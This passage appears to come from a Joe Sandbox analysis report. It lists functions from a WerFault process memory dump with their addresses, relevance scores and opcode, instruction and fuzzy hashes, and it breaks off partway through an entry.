                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 32ed7342e70efdacf64fc071342f5c8a0be92d7ca09692a40399ea1ac5a735a6
                                                • Instruction ID: 0b0181190372234e89dfd350336d92a1bc76175faec6dc946003e18a15d64013
                                                • Opcode Fuzzy Hash: 32ed7342e70efdacf64fc071342f5c8a0be92d7ca09692a40399ea1ac5a735a6
                                                • Instruction Fuzzy Hash: BC115871D985499FEB49DF98D894ABDBBB2FF58340F1441B9D02ED3282CA386902CB00
                                                Function 00007FF887B3AB5A Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: b456a334b9542ad2ec9516ae870f27972b1cef29d07d14e78dbfb601e1dc3e1b
                                                • Instruction ID: 8e6013b2a9490aff2913dc98599fafca1f9fa47c01efec5f7b3367609aaeecd8
                                                • Opcode Fuzzy Hash: b456a334b9542ad2ec9516ae870f27972b1cef29d07d14e78dbfb601e1dc3e1b
                                                • Instruction Fuzzy Hash: C0510731A9C69A4FF70D9A689C512BC77E2FB46358F6401BDD48FC7283D919A883C781
                                                Function 00007FF887B4060A Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: f1bdd1c668d02e8a44bd7c313bc36c13ef7629f40e69b24b8df764cfbca7007d
                                                • Instruction ID: d5e97b07a83382d8f42a7cbb0753620241e215b32e8757838a072de55228924f
                                                • Opcode Fuzzy Hash: f1bdd1c668d02e8a44bd7c313bc36c13ef7629f40e69b24b8df764cfbca7007d
                                                • Instruction Fuzzy Hash: 6A511631A9C6994FF70D9A6898512BC7BE2FB46358F2802FDC49FC7293D9196843C781
                                                Function 00007FF887B30C36 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 0f8a7e11a3bbc8574b7cc1af0e93059ed8ee378a0074054c4f10385b029ce6bf
                                                • Instruction ID: aa0325a6e74788d1c7d28299837d3eac9de5f768f77bd5fc981d5f98ee11e4d4
                                                • Opcode Fuzzy Hash: 0f8a7e11a3bbc8574b7cc1af0e93059ed8ee378a0074054c4f10385b029ce6bf
                                                • Instruction Fuzzy Hash: 4771C670D58A1D8FEB94EB68D894BACB7F2FF58341F5041A9D01DE7292DA34A981CF00
                                                Function 00007FF887B3F3E4 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0N_H
                                                • API String ID: 0-3998158670
                                                • Opcode ID: 49ccdac78354d4d1cdcfbc8d2034d47ebc2c212fdc945496cc56f8b5cc7a78f8
                                                • Instruction ID: 87662903f7b0f2b197926fa32d2b265a2e474cc015d84638fe5340aaac0eb396
                                                • Opcode Fuzzy Hash: 49ccdac78354d4d1cdcfbc8d2034d47ebc2c212fdc945496cc56f8b5cc7a78f8
                                                • Instruction Fuzzy Hash: E741383198CB474FE7259A68A4556BAB7F2FF45350B05067FD08EC3243DE2EA886C781
                                                Function 00007FF887B3FE55 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: e1cdd816583cdb7952d230c68e919d12aa7b2e24eeb9ed95346b1dc48c9b324b
                                                • Instruction ID: c150332c0d4d6667541df02b2fd1e687213d2fb45e679de9ce3795bb97fe6b0f
                                                • Opcode Fuzzy Hash: e1cdd816583cdb7952d230c68e919d12aa7b2e24eeb9ed95346b1dc48c9b324b
                                                • Instruction Fuzzy Hash: CA517030A58A464FE768DB29D09466AB2E2FF54344F504A7DD05FC3A96CA39F882CB40
                                                Function 00007FF887B3C4A5 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L
                                                • API String ID: 0-2896118805
                                                • Opcode ID: fd915e7ea1d573765ceff5962674a1b46924c0a8c010938f520c3c368441483b
                                                • Instruction ID: 20cf7df575aa5e6e17b74819c0e3f6e68c9ed5b6e5716080fb8a08fda49f371d
                                                • Opcode Fuzzy Hash: fd915e7ea1d573765ceff5962674a1b46924c0a8c010938f520c3c368441483b
                                                • Instruction Fuzzy Hash: 35418E32D4858A5FEB45ABA8F8166FDBBB2FF88750F0401B6E009D71D7CD282982C741
                                                Function 00007FF887B31AA0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 2c9f8e2edd9ad8f34ea52eb2a379bdaadd96bd389e248990d145ba9b33894008
                                                • Instruction ID: ad2052952992e58292d515a256933c60513fb2898040116a243e9accb1777f99
                                                • Opcode Fuzzy Hash: 2c9f8e2edd9ad8f34ea52eb2a379bdaadd96bd389e248990d145ba9b33894008
                                                • Instruction Fuzzy Hash: 2541C870D08A5D9FDB94EFA8D499BADBBF1FF68701F14006AD009E7295DB74A881CB40
                                                Function 00007FF887B35FC0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_I
                                                • API String ID: 0-1668815123
                                                • Opcode ID: 50dc2b2a7cbc8cda414cfb9852a3b5ebe29f65bccaa5403d05c3840375229c96
                                                • Instruction ID: 1b07d862f28b74549d43e35d7b91d9570a7ebae5f84fd0df6a27655a4c926746
                                                • Opcode Fuzzy Hash: 50dc2b2a7cbc8cda414cfb9852a3b5ebe29f65bccaa5403d05c3840375229c96
                                                • Instruction Fuzzy Hash: B231F432D4D5929BEB059A68A8A16FDBFF2FF123A4B4441B6D04C8B187DD186886C781
                                                Function 00007FF887B3CCA2 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: ef7801ddaba555f35737734ca9ac0a83bc706a6f505d41f34db9adbbb89f92a3
                                                • Instruction ID: ba47b1f04a4681571715a484e3e778624f993f00543c1e9acbd810ecea100f4b
                                                • Opcode Fuzzy Hash: ef7801ddaba555f35737734ca9ac0a83bc706a6f505d41f34db9adbbb89f92a3
                                                • Instruction Fuzzy Hash: 5F21D771D5C94A8FE798E6A898562BDB7F2FF45360F1401BAD44EC31C2ED185C86C381
                                                Function 00007FF887B363C8 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL
                                                • API String ID: 0-2915619072
                                                • Opcode ID: 4fee63b798dcc08fb0381f815134496b404ca91777af9f3fa2de9909bada84a4
                                                • Instruction ID: 69cea87130916f2d7eb738df9d40f32faa6f522e25358506b321dcb3ebc4bdce
                                                • Opcode Fuzzy Hash: 4fee63b798dcc08fb0381f815134496b404ca91777af9f3fa2de9909bada84a4
                                                • Instruction Fuzzy Hash: B821AC31D18A1E8FEB54EF98E8006EEB7F5FB89354F00017AE41DE3285DB35A9548781
                                                Function 00007FF887B392A2 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: cce2b602745c4588d1393e9b4ae0bc3147543866ed5a05b22bd9d99c67039d81
                                                • Instruction ID: 3d26029dc2c44f3fccdb4f3019293d0257ebee1c46e6d83fe0816eedf9c6cbeb
                                                • Opcode Fuzzy Hash: cce2b602745c4588d1393e9b4ae0bc3147543866ed5a05b22bd9d99c67039d81
                                                • Instruction Fuzzy Hash: 7A116332F6C91A4BEA58E55CE852ABCB3E3FF997A4B104276D01ED3282DD1468428781
                                                Function 00007FF887B3CC38 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 8f4426d8fb1fac2d0f6d95d279c6aa86345c2b923b4232b2909f15adc1098c4c
                                                • Instruction ID: c678450f3692853c9b44fa19931c6d75e40d80d8ec7e27a95926da2028552d4c
                                                • Opcode Fuzzy Hash: 8f4426d8fb1fac2d0f6d95d279c6aa86345c2b923b4232b2909f15adc1098c4c
                                                • Instruction Fuzzy Hash: CD115E32FAC92A5BAA58A65CE8425FC73F3FB98BA0B540175D04ED3282DD146C428785
                                                Function 00007FF887B365F9 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XE
                                                • API String ID: 0-1903603036
                                                • Opcode ID: a14eafb811baa3fa30d7bd4314e646a344ea33bfeea1054c27c96d352eb2a969
                                                • Instruction ID: 34e55f55aa252c8710dee1fbb9ef3887dcf0c499ec33b34eae9ba652b391006c
                                                • Opcode Fuzzy Hash: a14eafb811baa3fa30d7bd4314e646a344ea33bfeea1054c27c96d352eb2a969
                                                • Instruction Fuzzy Hash: 8311E036C8828A4FEB42ABA4A8492EDBFF0FF47364F0401B7D008D70D2DA285586C752
                                                Function 00007FF887B39B6B Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: cae9c0fa3e5676bf1175d723e9cebd9e49699a7994220195f1504f61a09ba7a9
                                                • Instruction ID: 6284bd687349293b10f147ec85d1f3030ffe2c4b318f89380682adf52b97abe9
                                                • Opcode Fuzzy Hash: cae9c0fa3e5676bf1175d723e9cebd9e49699a7994220195f1504f61a09ba7a9
                                                • Instruction Fuzzy Hash: 6A012862F1CD8A4FE788EE6C90447B9B3E1FF68345B0082BAC00EC3587EE24A8458340
                                                Function 00007FF887B3318D Relevance: .4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0edb775aec4d1811e2168381dd5750d2ce80e9484db383c0452ce80c853fa7a7
                                                • Instruction ID: c8d19f00029b494a6ac7e460824a59542a2e86b99704c4d286ad5b49164afbf1
                                                • Opcode Fuzzy Hash: 0edb775aec4d1811e2168381dd5750d2ce80e9484db383c0452ce80c853fa7a7
                                                • Instruction Fuzzy Hash: 62D11671D1869A8FEB98DB68D8647ADB7F2FF58340F1441B9D00DE7292CE386984CB41
                                                Function 00007FF887B331B0 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc30171668b348e28e6c748587aa94c181ae1cb36118a6a943bcd0281e69bc44
                                                • Instruction ID: e6d6841ae724765c6b1950acae88f08263f88880ef35915cbc056548b5ccc6cd
                                                • Opcode Fuzzy Hash: bc30171668b348e28e6c748587aa94c181ae1cb36118a6a943bcd0281e69bc44
                                                • Instruction Fuzzy Hash: 74B12871D18A9A8FEB98EB68C8647ADB6F2FF54340F1441BDD00DD7692CE386984CB41
                                                Function 00007FF887B3149A Relevance: .3, Instructions: 282COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8340983381d1e8f74971a6da1ae7dc89a2f23a2f2195a723ba321104728d32c8
                                                • Instruction ID: 0f669fded4a7d1488ce0a5a6c790e7830578e720e53534f82504c94a76fb7878
                                                • Opcode Fuzzy Hash: 8340983381d1e8f74971a6da1ae7dc89a2f23a2f2195a723ba321104728d32c8
                                                • Instruction Fuzzy Hash: DF81E231C8C94F8FEB65DBA898012FC7BF5FF56350F05027AD45AD3182EA28685AC791
                                                Function 00007FF887B4138D Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3821d232124faebe3a280369cc6a7cf08e58fdf41d7856b34a6f75522be9eab1
                                                • Instruction ID: d58423aed39c22bfdd8d1c7276694bdf20023fa4234a08d01647281cd30c3035
                                                • Opcode Fuzzy Hash: 3821d232124faebe3a280369cc6a7cf08e58fdf41d7856b34a6f75522be9eab1
                                                • Instruction Fuzzy Hash: 80A17130A98B068FE368CB28D4945A977F2FF54350B54497DC48EC7A96DB39F882CB41
                                                Function 00007FF887B3B62D Relevance: .3, Instructions: 279COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 097e42b9094dfd08946dda984bdc48e5efa5f89095d86e8927279179fbcc95d4
                                                • Instruction ID: 26567b7f0a3b62572a48eb47c3ff3c8a16baf6a8b37b5a8ce731f907e99df2a2
                                                • Opcode Fuzzy Hash: 097e42b9094dfd08946dda984bdc48e5efa5f89095d86e8927279179fbcc95d4
                                                • Instruction Fuzzy Hash: CFA1C530A58B068FE369CB28D4955BA77F2FF44344B64497DC08AC7696DB39F882CB41
                                                Function 00007FF887B3C820 Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10388a9bc0b4b2737f53249c42900a702b27d93ecfcaec97fad2d62cf5fdc23e
                                                • Instruction ID: 4283d51a6c710b2234702b2ef0a5cbb6eda4bdfba6e33e33b9d6da01e0bf3b89
                                                • Opcode Fuzzy Hash: 10388a9bc0b4b2737f53249c42900a702b27d93ecfcaec97fad2d62cf5fdc23e
                                                • Instruction Fuzzy Hash: 9A8173319586499FDB41EBA8D895BED7BF1FF49350F1402B6E018D32C3CA386985CB92
                                                Function 00007FF887B335C0 Relevance: .2, Instructions: 234COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72e106c29f759214e1eed53babc5a835c6d5d4b6f9ec484efed44212ea79dd08
                                                • Instruction ID: 6d5219f52667b344d067eff122727bb4d6fcde337772de7de60fc903f97c61c5
                                                • Opcode Fuzzy Hash: 72e106c29f759214e1eed53babc5a835c6d5d4b6f9ec484efed44212ea79dd08
                                                • Instruction Fuzzy Hash: B4910270D1864A8FDB58DFA4C490AEEB7B2FF59341F60017DE00DA7292CA39A981CF51
                                                Function 00007FF887B3C888 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c5191730701cde2d7c662eaf5addb472896e9f7d2e53eec4bf60e89360f407b
                                                • Instruction ID: 1e390de02a6be6dcfbe9f449e9641c32bec5990fcaef2ed776866652ffaf1f3b
                                                • Opcode Fuzzy Hash: 7c5191730701cde2d7c662eaf5addb472896e9f7d2e53eec4bf60e89360f407b
                                                • Instruction Fuzzy Hash: 09615F31A586498FDB41EB98D491BEDBBF1FF58350F140679E018D32C7CA38A881CB92
                                                Function 00007FF887B39BE6 Relevance: .2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c8bc5ff9f23b4bba3803ec51bb37965b31d5acdd0094f39aca292f9798449d
                                                • Instruction ID: 9fb990be9dd927a058f196bb41fb96a372690a01b846bd71e1a5caccb31b174b
                                                • Opcode Fuzzy Hash: 25c8bc5ff9f23b4bba3803ec51bb37965b31d5acdd0094f39aca292f9798449d
                                                • Instruction Fuzzy Hash: 73518B3194CA874FE3359B28A455279BBF2FF55394B0401BEC08EC7183DE2DA886C752
                                                Function 00007FF887B38DCF Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5cd2b19d4e7f27300cb8cfd29b0024258ac82c552fa5c24ac5f1b12797a6199
                                                • Instruction ID: f4441279a729e2f9f84b78f16d62dc63abfe7d5a25d98f5d5a7223218ef5f8a8
                                                • Opcode Fuzzy Hash: e5cd2b19d4e7f27300cb8cfd29b0024258ac82c552fa5c24ac5f1b12797a6199
                                                • Instruction Fuzzy Hash: 9651D532C8D2DA4FD7126B60AC515EA7FB4FF02350F0902B7D458C7092DA2DA696C362
                                                Function 00007FF887B32810 Relevance: .2, Instructions: 177COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9087a3b1a4fe2d9e4d74d90e107a1018506d30be612af09001a5eea0d85dced5
                                                • Instruction ID: f7c7eb57fa04eebb406d5506ca78b945254a205bac2db217bdaf1f3e919676f9
                                                • Opcode Fuzzy Hash: 9087a3b1a4fe2d9e4d74d90e107a1018506d30be612af09001a5eea0d85dced5
                                                • Instruction Fuzzy Hash: F9518B31848A0D8FCB44EFA8D8546EDBBF1FF4A310F40067AE008D7292DB39A595CB91
                                                Function 00007FF887B317D5 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f262475ee28b1318b43eafbe8e451aa6dc15d0f926dd706bf5acfb7277abea3
                                                • Instruction ID: 536ddbfd40ec4a2a9179a3d8e3cdf5f2ec33fa84744e7bf56403662d9035d91e
                                                • Opcode Fuzzy Hash: 5f262475ee28b1318b43eafbe8e451aa6dc15d0f926dd706bf5acfb7277abea3
                                                • Instruction Fuzzy Hash: F361EA70D1465D8FEB84EBA8D899BECBBB1FF58340F10416AD00DE7292DB386985CB41
                                                Function 00007FF887B36491 Relevance: .2, Instructions: 154COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c4456ec5e8772f2218536a8a23e5d6a39b293f6d308ffbbbf0da34d4f0e8ca0
                                                • Instruction ID: f2753d315c14be66815416af5665575ede9bad46d95c3fbde3b3baa1254c31ef
                                                • Opcode Fuzzy Hash: 9c4456ec5e8772f2218536a8a23e5d6a39b293f6d308ffbbbf0da34d4f0e8ca0
                                                • Instruction Fuzzy Hash: 48415930D4855D9FDB44EFA8D844AEDBBF1FF5A310F01017AE009E7291CA39A991CB91
                                                Function 00007FF887B36970 Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 216c71bd340fdc53de016d69c2e3cb054f2c1a7786bd86efbed124ee827878f0
                                                • Instruction ID: 059b7e76d72b366705e052b6ad72c6255a1c479640929007fd77b6441fd9cced
                                                • Opcode Fuzzy Hash: 216c71bd340fdc53de016d69c2e3cb054f2c1a7786bd86efbed124ee827878f0
                                                • Instruction Fuzzy Hash: C8412971A5CA534FE31DCA2C94554BEB7F2FF94354B1446BED08BC328AED18A486C741
                                                Function 00007FF887B384D1 Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29f82ad4a02a298167be3908337f01474ee6831d795140b2cc40633e2e5af681
                                                • Instruction ID: 9e9e4a96d54446c1802589a37985db753daa5ecf627fff53f3c9684a8dbf6886
                                                • Opcode Fuzzy Hash: 29f82ad4a02a298167be3908337f01474ee6831d795140b2cc40633e2e5af681
                                                • Instruction Fuzzy Hash: D3419C31D4890E9BDB64EF18E8806FDB3B9FB59390F00117AE01DE7281DB35AA85CB55
                                                Function 00007FF887B38E3D Relevance: .1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5775b48f2803463c4b988498af5e807038edb1f76c5ce7414a5266c711095c1d
                                                • Instruction ID: 91b71987c8b8d0d295b2d2f411a45cb65fe938fcf484e8016e5b52de975a4763
                                                • Opcode Fuzzy Hash: 5775b48f2803463c4b988498af5e807038edb1f76c5ce7414a5266c711095c1d
                                                • Instruction Fuzzy Hash: BF41B43188E3D64FD71757706C665EA3FB4AF03210B0A02E7E498CB493D51DA596C363
                                                Function 00007FF887B3847A Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a466e744906314f643916410e0ab6c1460c824a29d2655d6ce65252c1f2f1af1
                                                • Instruction ID: cb4ef2fbba3be378b9c8ec9ae258b0cdc583e1c6a147f92fd71d707c6052250c
